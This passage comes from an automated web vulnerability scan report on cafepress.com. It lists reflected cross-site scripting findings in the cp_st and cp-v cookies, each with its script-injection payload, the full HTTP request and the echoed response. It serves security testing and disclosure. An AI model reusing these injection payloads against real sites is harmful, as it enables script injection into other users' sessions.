HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 58907 Date: Sun, 26 Dec 2010 13:47:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:30 GMT; path=/ Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:30 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA179e4"-alert(1)-"9112d7547c6 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.67. http://www.cafepress.com/+thermos [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+thermos
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dee73</script><script>alert(1)</script>b29a0dee205 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=dee73</script><script>alert(1)</script>b29a0dee205 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 58934 Date: Sun, 26 Dec 2010 13:47:29 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/ Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58934 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'dee73</script><script>alert(1)</script>b29a0dee205 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.68. http://www.cafepress.com/+underwear-panties [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+underwear-panties
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f16ed"-alert(1)-"d43c21ef02f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+underwear-panties HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAf16ed"-alert(1)-"d43c21ef02f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 59420 Date: Sun, 26 Dec 2010 13:47:21 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:21 GMT; path=/ Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:21 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59420 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf16ed"-alert(1)-"d43c21ef02f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.69. http://www.cafepress.com/+underwear-panties [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+underwear-panties
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3af</script><script>alert(1)</script>ca50a4bf9d6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+underwear-panties HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=7c3af</script><script>alert(1)</script>ca50a4bf9d6 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 59441 Date: Sun, 26 Dec 2010 13:47:17 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/ Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59441 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '7c3af</script><script>alert(1)</script>ca50a4bf9d6 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.70. http://www.cafepress.com/+water-bottles [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+water-bottles
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35244"-alert(1)-"6a269d15e05 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA35244"-alert(1)-"6a269d15e05 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW22 Cteonnt-Length: 61013 Date: Sun, 26 Dec 2010 13:47:25 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/ Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 61013 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA35244"-alert(1)-"6a269d15e05 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.71. http://www.cafepress.com/+water-bottles [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+water-bottles
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2b6f</script><script>alert(1)</script>6386f2e7ab was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c2b6f</script><script>alert(1)</script>6386f2e7ab ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 61029 Date: Sun, 26 Dec 2010 13:47:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/ Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 61029 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'c2b6f</script><script>alert(1)</script>6386f2e7ab ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.72. http://www.cafepress.com/+womens-tank-tops [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+womens-tank-tops
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec3ed"-alert(1)-"6cdf0b2af4a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
